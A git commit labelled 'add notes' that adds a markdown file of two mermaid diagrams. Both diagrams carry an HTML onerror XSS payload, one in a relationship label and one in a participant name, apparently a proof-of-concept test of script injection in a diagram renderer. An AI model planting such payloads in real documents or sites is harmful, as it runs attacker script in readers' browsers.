add notes

This commit is contained in:
2026-09-27 19:55:20 +08:00
parent ba6af62c3d
commit 5c4ad3a8b2

View File

@@ -1,3 +1,12 @@
# docs-notes notes
notes ```mermaid
erDiagram
A ||--o{ B : "<img src=x onerror=window.__mx||(window.__mx=1,alert(location.host))>"
```
```mermaid
sequenceDiagram
participant A as Alice<img src=x onerror=window.__mx||(window.__mx=1,alert(location.host))>$$\text{A}$$
A->>B: hi
```